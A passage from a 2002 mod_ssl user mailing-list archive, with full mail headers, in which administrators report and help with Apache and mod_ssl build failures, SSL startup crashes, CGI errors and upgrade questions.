  location: /var/tmp/apache_1.3.26 (Version 1.3.26)
 + Auxiliary =
patch=20
  tool: ./etc/patch/patch (local)
./configure:Error: Building of =
'patch' tool=20
  failed:
-------------------------------------------------
x=20
  patch/rename.c, 1323 bytes, 3 tape blocks
x patch/util.c, 9365 =
bytes, 19=20
  tape blocks
x patch/util.h, 2325 bytes, 5 tape blocks
x =
patch/version.c,=20
  280 bytes, 1 tape blocks
x patch/version.h, 25 bytes, 1 tape=20
  blocks
loading cache ./config.cache
checking for gcc... =
gcc
checking=20
  whether the C compiler (gcc  ) works... no
configure: error:=20
  installation or configuration problem: C compiler cannot
create=20
  executables.
make: *** No targets. =20
  Stop.
-------------------------------------------------
Hint: =
Either try=20
  to build 'patch' under etc/patch/
Hint: manually and re-run this=20
  'configure' script
Hint: or provide us the path to your vendor=20
  'patch'
Hint: program via the --with-patch=3DFILE option =
(but
Hint: expect=20
  perhaps failures when applying patches!)


  
My OS is Solaris 8 and I have tested it with =
two=20
  versions of gcc : 9.95.2 and 3.1

  
I had no problems with the installation of =
apache 1.3.20=20
  and mod_ssl 2.8.4

  

Did anybody experienced this problem and =
have found=20
  a solution?

  
 

  
Thanks in advance.

  
 

  
Oscar.


------=_NextPart_000_01E6_01C21C69.EB201F90--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 25 17:20:29 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA22066; Tue, 25 Jun 2002 17:19:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id RAA22044; Tue, 25 Jun 2002 17:18:33 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id A3FAB4CE789; Tue, 25 Jun 2002 17:18:32 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id B8EFC28742; Tue, 25 Jun 2002 17:16:56 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from goliath.siemens.de id QAA16655; Tue, 25 Jun 2002 16:10:42 +0200 (MET DST)
Received: from mail1.siemens.de (mail1.siemens.de [139.23.33.14])
	by goliath.siemens.de (8.11.6/8.11.6) with ESMTP id g5PEAe215455
	for ; Tue, 25 Jun 2002 16:10:40 +0200 (MEST)
Received: from mchp9daa.mch.sbs.de (mchp9daa.mch.sbs.de [139.25.137.99])
	by mail1.siemens.de (8.11.6/8.11.6) with ESMTP id g5PEAe120161
	for ; Tue, 25 Jun 2002 16:10:40 +0200 (MEST)
Received: by mchp9daa.mch.sbs.de with Internet Mail Service (5.5.2653.19)
	id ; Tue, 25 Jun 2002 16:10:41 +0200
Message-ID: 
From: Moeller Wolf-Dietrich 
To: modssl-users@modssl.org
Subject: cgi script with "SSLOptions +StdEnvVars" fails 
Date: Tue, 25 Jun 2002 16:07:34 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id QAA16677
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Moeller Wolf-Dietrich 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Executing scripts on my Apache2 leads to the following error log lines
(example):
  [Tue Jun 25 15:13:07 2002] [error] [client 127.0.0.1] (22)Invalid
argument: couldn't create child process: 22: E:/Web/cgi-bin/test.pl
  [Tue Jun 25 15:13:07 2002] [error] [client 127.0.0.1] (22)Invalid
argument: couldn't spawn child process: E:/Web/cgi-bin/test.pl

If I remove the "SSLOptions +StdEnvVars" from ssl.conf, all scripts work
fine. (Executing scripts on any other virtual host without ssl also works
fine).
Does anyone have a clue? or is it a mod_ssl bug?
-------------------------
System: WinNT 4.0 SP6a, Apache installed from
"Apache-2.0.39-Mod_SSL-OpenSSL-0.9.6d-Win32.zip" from
"http://www.modssl.org/contrib/"

httpd.conf (snippet) and ssl.conf:
-------------------------
ScriptAlias /cgi-bin/ "E:/Web/cgi-bin/"

    AllowOverride Limit
    Order allow,deny
    Allow from all

-------------------------
Listen 443
NameVirtualHost *:443
SSLSessionCache         dbm:logs/ssl_scache
SSLSessionCacheTimeout  300
SSLMutex sem
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin

    ServerName localhost
    SSLEngine on
    SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
    SSLCertificateFile conf/ssl/server.cert
    SSLCertificateKeyFile conf/ssl/server.key
    
        AllowOverride Limit
        SSLOptions +StdEnvVars
    
    SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0
                                  
-------------------------

----------------------------------------
Dr. Wolf-Dietrich Moeller
Siemens AG, CT IC 3, D-81730 München
Corporate Technology Department Security
Mch P, Tel. +49 89 636-53391, Fax -48000
wolf-dietrich.moeller@siemens.com
Intranet https://security.ct.siemens.de/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 25 18:23:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA26956; Tue, 25 Jun 2002 18:22:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id SAA26935; Tue, 25 Jun 2002 18:21:52 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 445074CE77F; Tue, 25 Jun 2002 18:21:51 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 73872287D0; Tue, 25 Jun 2002 18:08:32 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from rhea.tiscali.nl id RAA23127; Tue, 25 Jun 2002 17:35:30 +0200 (MET DST)
Received: from notebook.zonnet.nl (unknown [195.240.205.153])
	by rhea.tiscali.nl (Postfix) with ESMTP id 51C2A37285
	for ; Tue, 25 Jun 2002 17:35:20 +0200 (MET DST)
Message-Id: <4.3.2.7.2.20020624141256.04526ee0@pop.atz-hosting.nl>
X-Sender: ouwerkerk92@pop3.zonnet.nl
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Tue, 25 Jun 2002 11:15:35 +0200
To: modssl-users@modssl.org
From: "B. van Ouwerkerk" 
Subject: Re: apache 2.0 hates older linux kernels:
In-Reply-To: 
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "B. van Ouwerkerk" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


>uname -a
>Linux darkstar 2.0.35 #4 Mon Dec 14 18:18:57 CST 1998 i586 unknown
>
>and no matter how we configure, apache dies under

SNIP

Just tested it on my old local testbed server.. (not online)

Slackware 7.1.0
Kernel 2.2.16
Apache 2.0.39

Just did the normal configure, make and make install.. now it's running 
Apache 2.. Uhm.. yeah.. so.. since 2.2.16 qualifies for 'older kernel' ;) 
something else must be the reason why it failed on your box..

Bye,


B.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 25 18:23:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA26962; Tue, 25 Jun 2002 18:22:27 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id SAA26936; Tue, 25 Jun 2002 18:21:52 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 533664CE787; Tue, 25 Jun 2002 18:21:51 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 3E7E728742; Tue, 25 Jun 2002 18:08:39 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mailhost.marconi-pensions.co.uk id RAA23286; Tue, 25 Jun 2002 17:37:56 +0200 (MET DST)
Received: from marconi-pensions.co.uk (localhost [127.0.0.1])
	by mailhost.marconi-pensions.co.uk (8.10.2+Sun/8.10.2) with ESMTP id g5PFbmR19053
	for ; Tue, 25 Jun 2002 16:37:48 +0100 (BST)
Received: from marconi.com (gallium [211.208.212.31])
	by marconi-pensions.co.uk (8.10.2+Sun/8.10.2) with ESMTP id g5PFblB19049
	for ; Tue, 25 Jun 2002 16:37:47 +0100 (BST)
Message-ID: <3D188E4D.8080503@marconi.com>
Disposition-Notification-To: Dave Kimberley 
Date: Tue, 25 Jun 2002 16:37:49 +0100
From: Dave Kimberley 
User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.0rc2) Gecko/20020512 Netscape/7.0b1
X-Accept-Language: en-gb, en, en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Apache 2.0.39 problems on Solaris 9
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave Kimberley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Problem: Cannot get Apache 2.0.39 to run on Solaris 9 with SSL.

Details:

cc: Sun Workshop 6 update 2 C 5.3 2001/05/15

Compiled and installed openssl-0.9.6d

Compiled and installed Apache 2.0.39 ( ./configure 
--prefix=/usr/local/apache --enable-ssl --with-ssl=/usr/local/ssl 
--enable-rewrite )

Added custom cert

Tried starting Apache without SSL, works but get an SSLSessionCache warning:
# /usr/local/apache/bin/apachectl start
# more error_log
[Tue Jun 25 16:22:17 2002] [warn] Init: Session Cache is not configured 
[hint: SSLSessionCache]
[Tue Jun 25 16:22:19 2002] [notice] Apache/2.0.39 (Unix) mod_ssl/2.0.39 
OpenSSL/0.9.6d configured -- resuming normal operations

Tried starting Apache with SSL, crashes
# /usr/local/apache/bin/apachectl startssl
[Tue Jun 25 16:21:32 2002] [crit] [Tue Jun 25 16:21:32 2002] file 
vhost.c, line 232, assertion "rv == APR_SUCCESS" failed
Abort - core dumped


Any ideas

Thanks


Dave
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 25 18:28:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA27417; Tue, 25 Jun 2002 18:27:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mailhost.marconi-pensions.co.uk id SAA27370; Tue, 25 Jun 2002 18:26:20 +0200 (MET DST)
Received: from marconi-pensions.co.uk (localhost [127.0.0.1])
	by mailhost.marconi-pensions.co.uk (8.10.2+Sun/8.10.2) with ESMTP id g5PGQ8R19734
	for ; Tue, 25 Jun 2002 17:26:09 +0100 (BST)
Received: from marconi-pensions.co.uk (gallium [211.208.212.31])
	by marconi-pensions.co.uk (8.10.2+Sun/8.10.2) with ESMTP id g5PGQ8B19730
	for ; Tue, 25 Jun 2002 17:26:08 +0100 (BST)
Message-ID: <3D1899A2.2040407@marconi-pensions.co.uk>
Disposition-Notification-To: Dave Kimberley
 
Date: Tue, 25 Jun 2002 17:26:10 +0100
From: Dave Kimberley 
Organization: Marconi plc, Pensions Office
User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.0rc2) Gecko/20020512 Netscape/7.0b1
X-Accept-Language: en-gb, en, en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Apache 2.0.39 problems on Solaris 9
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave Kimberley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Problem: Cannot get Apache 2.0.39 to run on Solaris 9 with SSL.

Details:

cc: Sun Workshop 6 update 2 C 5.3 2001/05/15

Compiled and installed openssl-0.9.6d

Compiled and installed Apache 2.0.39 ( ./configure
--prefix=/usr/local/apache --enable-ssl --with-ssl=/usr/local/ssl
--enable-rewrite )

Added custom cert

Tried starting Apache without SSL, works but get an SSLSessionCache warning:
# /usr/local/apache/bin/apachectl start
# more error_log
[Tue Jun 25 16:22:17 2002] [warn] Init: Session Cache is not configured
[hint: SSLSessionCache]
[Tue Jun 25 16:22:19 2002] [notice] Apache/2.0.39 (Unix) mod_ssl/2.0.39
OpenSSL/0.9.6d configured -- resuming normal operations

Tried starting Apache with SSL, crashes
# /usr/local/apache/bin/apachectl startssl
[Tue Jun 25 16:21:32 2002] [crit] [Tue Jun 25 16:21:32 2002] file
vhost.c, line 232, assertion "rv == APR_SUCCESS" failed
Abort - core dumped


Any ideas

Thanks


Dave
-- 
-------------------------------------------------------------
   Dave Kimberley                         Tel: +44 1785 785489
   System Administrator                   Fax: +44 1785 785401
   Marconi Pensions Office   http://www.marconi-pensions.co.uk
-------------------------------------------------------------


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 25 18:34:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA27942; Tue, 25 Jun 2002 18:33:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from COHNTFS24.ci.henderson.nv.us id SAA27847; Tue, 25 Jun 2002 18:32:29 +0200 (MET DST)
Received: from gty.ci.henderson.nv.us (gwia.ci.henderson.nv.us) by COHNTFS24.ci.henderson.nv.us
 (Content Technologies SMTPRS 4.2.10) with SMTP id  for ;
 Tue, 25 Jun 2002 09:32:57 -0700
Received: from HENMAIL2-Message_Server by gty.ci.henderson.nv.us
	with Novell_GroupWise; Tue, 25 Jun 2002 09:32:20 -0700
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 5.5.6.1
Date: Tue, 25 Jun 2002 09:32:15 -0700
From: "Jeff Landers" 
To: 
Subject: Re: Apache 2.0.39 problems on Solaris 9
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id SAA27939
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff Landers" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Dave,

Did you check your config.log to see if it even configures correctly. I can't get past the parse errors. If I ignore them I get the same errors that you are.

>>> dave.kimberley@marconi.com 06/25/02 08:37AM >>>

Problem: Cannot get Apache 2.0.39 to run on Solaris 9 with SSL.

Details:

cc: Sun Workshop 6 update 2 C 5.3 2001/05/15

Compiled and installed openssl-0.9.6d

Compiled and installed Apache 2.0.39 ( ./configure 
--prefix=/usr/local/apache --enable-ssl --with-ssl=/usr/local/ssl 
--enable-rewrite )

Added custom cert

Tried starting Apache without SSL, works but get an SSLSessionCache warning:
# /usr/local/apache/bin/apachectl start
# more error_log
[Tue Jun 25 16:22:17 2002] [warn] Init: Session Cache is not configured 
[hint: SSLSessionCache]
[Tue Jun 25 16:22:19 2002] [notice] Apache/2.0.39 (Unix) mod_ssl/2.0.39 
OpenSSL/0.9.6d configured -- resuming normal operations

Tried starting Apache with SSL, crashes
# /usr/local/apache/bin/apachectl startssl
[Tue Jun 25 16:21:32 2002] [crit] [Tue Jun 25 16:21:32 2002] file 
vhost.c, line 232, assertion "rv == APR_SUCCESS" failed
Abort - core dumped


Any ideas

Thanks


Dave
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org 
User Support Mailing List                      modssl-users@modssl.org 
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 25 19:33:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA03353; Tue, 25 Jun 2002 19:32:59 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id TAA03263; Tue, 25 Jun 2002 19:32:14 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id NAA23811;
	Tue, 25 Jun 2002 13:33:08 -0400
Date: Tue, 25 Jun 2002 13:33:08 -0400 (EDT)
From: "R. DuFresne" 
To: "B. van Ouwerkerk" 
cc: modssl-users@modssl.org
Subject: Re: apache 2.0 hates older linux kernels:
In-Reply-To: <4.3.2.7.2.20020624141256.04526ee0@pop.atz-hosting.nl>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 25 Jun 2002, B. van Ouwerkerk wrote:

> 
> >uname -a
> >Linux darkstar 2.0.35 #4 Mon Dec 14 18:18:57 CST 1998 i586 unknown
> >
> >and no matter how we configure, apache dies under
> 
> SNIP
> 
> Just tested it on my old local testbed server.. (not online)
> 
> Slackware 7.1.0
> Kernel 2.2.16
> Apache 2.0.39


Umm, yers might be considered older in relative terms, but, I'm using a
slackware 3.6 version on the box I'm trying to work on, so the kernel is a
patched up 2.0.35-6 derivative, older yet then the 7.1 slackware/2.2.16
kernel you are working on there.

Now, thanks to Cliff w/ apache.org we have gotten farther, but are still a
tad short;

> #define HZ 100
>
> in mod_status and it will at least come closer to compiling.

Cliff,

This comes so close, yet remains so far;

the compile looks to complete without any serious errors:


I edit mod_status.c;

/*
#ifdef NEXT
#if (NX_CURRENT_COMPILER_RELEASE == 410)
#ifdef m68k
#define HZ 64
#else
#define HZ 100
#endif
#else
#include 
#endif
#endif  NEXT */

#define HZ 100


here is my config statement;

configure --disable-threads  --enable-suexec --with-suexec-caller=nobody
--with-suexec-uidmin=500 --enable-module=mod_rewrite
--enable-module=mod_cgi --enable-module-shared=ssl
--with-ssl=/usr/local/ssl --enable-static-rotatelogs
--enable-static-logresolve


this goves me a httpd, httpd -l

Compiled in modules:
  core.c
  mod_access.c
  mod_auth.c
  mod_include.c
  mod_log_config.c
  mod_env.c
  mod_setenvif.c
  prefork.c
  http_core.c
  mod_mime.c
  mod_status.c
  mod_autoindex.c
  mod_asis.c
  mod_suexec.c
  mod_cgi.c
  mod_negotiation.c
  mod_dir.c
  mod_imap.c
  mod_actions.c
  mod_userdir.c
  mod_alias.c
  mod_so.c



It gives me static binaries under support;

-rwx------   1 root     root         5561 Jun 24 18:37 ab*
-rwx------   1 root     root         5591 Jun 24 18:37 checkgid*
-rwx------   1 root     root         5576 Jun 24 18:37 htdbm*
-rwx------   1 root     root         5591 Jun 24 18:36 htdigest*
-rwx------   1 root     root         5591 Jun 24 18:36 htpasswd*
-rwx------   1 root     root        19875 Jun 24 18:37 logresolve*
-rwx------   1 root     root       272278 Jun 24 18:37 rotatelogs*
-rwx------   1 root     root        24613 Jun 24 18:38 suexec*
-rw-------   1 root     root        20595 Jun 24 17:25 apxs


but, under modules/ssl, it looks like it was mostly untouched, no compiled
.so is left there, nothing.  The only files that appear might have been
touched in the process;

-rw-------   1 root     root         3371 Jun 24 17:25 Makefile
...
-rw-------   1 root     root           51 Jun 24 17:25 modules.mk


Though this may well be the reseult of the make clean just prior to the
last config/make...

So, we're almost there, any clues?




Thanks,

Ron DuFresne
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!







______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 25 19:40:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA03885; Tue, 25 Jun 2002 19:39:45 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from COHNTFS24.ci.henderson.nv.us id TAA03776; Tue, 25 Jun 2002 19:38:24 +0200 (MET DST)
Received: from gty.ci.henderson.nv.us (gwia.ci.henderson.nv.us) by COHNTFS24.ci.henderson.nv.us
 (Content Technologies SMTPRS 4.2.10) with SMTP id  for ;
 Tue, 25 Jun 2002 10:38:53 -0700
Received: from HENMAIL2-Message_Server by gty.ci.henderson.nv.us
	with Novell_GroupWise; Tue, 25 Jun 2002 10:38:16 -0700
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 5.5.6.1
Date: Tue, 25 Jun 2002 10:37:57 -0700
From: "Jeff Landers" 
To: 
Subject: Compiling openssl for apache by a novice
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id TAA03835
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff Landers" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I am restarting my Apache 2.0.3.9 install from the beginning. Is there anything special that needs to be done while compiling openssl on Solaris 8 in preparation for apache with ssl enabled? The openssl docs are pretty straightforward but I have a tip that I should be doing this:

./config -lzlib

and then add 

DEVRANDOM=/dev/random      to the Makefile

Can any gurus help?






______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 25 19:57:25 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA05317; Tue, 25 Jun 2002 19:56:38 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from COMAL.uanet.edu id TAA05263; Tue, 25 Jun 2002 19:55:45 +0200 (MET DST)
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: Upgrade ?
Date: Tue, 25 Jun 2002 13:55:39 -0400
Message-ID: <4EAB3F5D46284A408F6A998255B118812E4B2A@COMAL.uanet.edu>
Thread-Topic: Upgrade ?
Thread-Index: AcIbuusg//x2PNYkTKukCYEidx8ExwAti4OA
From: "Hunt,Keith A" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id TAA05294
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Hunt,Keith A" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Ron, 

I have had that same issue when I have upgraded apache.  I never noticed that it caused a problem, but it certainly bothered me that php did not know which version of apache was running.  I fixed it by recompiling php (including a make clean) and restarting apache.

Keith Hunt  330.972.7968  keith@uakron.edu
Internet & Server Systems
The University of Akron 

> -----Original Message-----
> From: RON MCKEEVER [mailto:rmckeever@earthlink.net]
> Sent: Monday, June 24, 2002 3:42 PM
> To: modssl-users@modssl.org
> Subject: Re: Upgrade ?
> 
> 
> Hi Mr Woolley,
> 
> Thanks, for the email. That REALLY helped me to get my 
> mod_ssl-2.8.7-1.3.23
> upgraded to mod_ssl-2.8.10-1.3.26. 
> aca# pwd
> opt/apache/bin
> aca# ./apachectl startssl
> Apache/1.3.26 mod_ssl/2.8.10 (Pass Phrase Dialog)
> 
> 
> I was wondering is there a web page at apache/or modssl site 
> that explains the
> upgrade process?  
> 
> This ? might not be for you or this group but I guess I'll 
> ask anyway. 
> 
> When I use my phpinfo page, to see config info it shows that 
> apache is :
> Apache Version    Apache/1.3.23 
> 
> but If I look a little further down on the phpinfo page I see 
> the correct
> info:
> 
> ["SERVER_SIGNATURE"] 
Apache/1.3.26 Server at aca.fff.com Port
> 443
 
> ["SERVER_SOFTWARE"] Apache/1.3.26 (Unix) PHP/4.1.2 mod_ssl/2.8.10
> OpenSSL/0.9.6 mod_perl/1.26  
> 
> I have rebooted my system and still that one line in php 
> shows the wrong
> version? Any Ideas? 
> 
> Thanks Again,
> Ron
> 
> 
> On Mon, 24 Jun 2002 11:32:06 -0400 (EDT) Cliff Woolley 
> 
> wrote:
> 
> On Mon, 24 Jun 2002, RON MCKEEVER wrote:
> 
> > Im a little confused on how to upgrade my current 
> mod_ssl-2.8.7-1.3.23, to
> > mod_ssl-2.8.10-1.3.26.
> > When I untar the new apache1.3.26 it is in it own dir.. So 
> how do I upgrade
> > 1.3.23? When I run the configure statement in the 
> mod_ssl-2.8.10 dir I cant
> > state --with-apache="1.3.23", I need to state the new 
> apache dir, right??
> 
> Right... you give mod_ssl-2.8.10 the Apache 1.3.26 *source* 
> directory for
> its --with-apache= argument.  Then when you configure apache, 
> tell it to
> *install* to the same location that 1.3.23 is currently 
> installed using
> --prefix= (eg /usr/local/apache) and use the same directory structure
> (using --with-layout= ) that you used before, if any.  Then 
> when you run
> 'make install' from the Apache 1.3.26 source directory, it 
> will overwrite
> your 1.3.23 installation.
> 
> That should be it.
> 
> --Cliff
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 25 20:09:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA06328; Tue, 25 Jun 2002 20:09:01 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.inorth.com id UAA06250; Tue, 25 Jun 2002 20:07:45 +0200 (MET DST)
Received: by mail.inorth.com with Internet Mail Service (5.5.2653.19)
	id ; Tue, 25 Jun 2002 14:06:54 -0400
Message-ID: 
From: Henning Sittler 
To: "'modssl-users@modssl.org'" 
Subject: RE: Upgrade ?
Date: Tue, 25 Jun 2002 14:07:38 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C21C73.30D5A600"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Henning Sittler 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C21C73.30D5A600
Content-Type: text/plain;
	charset="iso-8859-1"

Recompiling PHP is really the only accurate solution to that one line from
phpinfo():

Apache Version    Apache/1.3.23 

is from the last (clean?) compile of PHP, and does not reflect any chages or
updates made to Apache since then.  However, the SERVER_SIGNATURE env var
shown in phpinfo() is up to date and accurate, because it's directly from
the current Apache.

Henning Sittler
www.inscriber.com



-----Original Message-----
From: Hunt,Keith A [mailto:keith@uakron.edu]
Sent: Tuesday, June 25, 2002 1:56 PM
To: modssl-users@modssl.org
Subject: RE: Upgrade ?


Ron, 

I have had that same issue when I have upgraded apache.  I never noticed
that it caused a problem, but it certainly bothered me that php did not know
which version of apache was running.  I fixed it by recompiling php
(including a make clean) and restarting apache.

Keith Hunt  330.972.7968  keith@uakron.edu
Internet & Server Systems
The University of Akron 


> 
> When I use my phpinfo page, to see config info it shows that 
> apache is :
> Apache Version    Apache/1.3.23 

------_=_NextPart_001_01C21C73.30D5A600
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable






RE: Upgrade ?




Recompiling PHP is really the only accurate solution =
to that one line from phpinfo():




Apache Version    Apache/1.3.23 =





is from the last (clean?) compile of PHP, and does =
not reflect any chages or updates made to Apache since then.  =
However, the SERVER_SIGNATURE env var shown in phpinfo() is up to date =
and accurate, because it's directly from the current Apache.



Henning Sittler

www.inscriber.com








-----Original Message-----

From: Hunt,Keith A [mailto:keith@uakron.edu]

Sent: Tuesday, June 25, 2002 1:56 PM

To: modssl-users@modssl.org

Subject: RE: Upgrade ?






Ron, 




I have had that same issue when I have upgraded =
apache.  I never noticed that it caused a problem, but it =
certainly bothered me that php did not know which version of apache was =
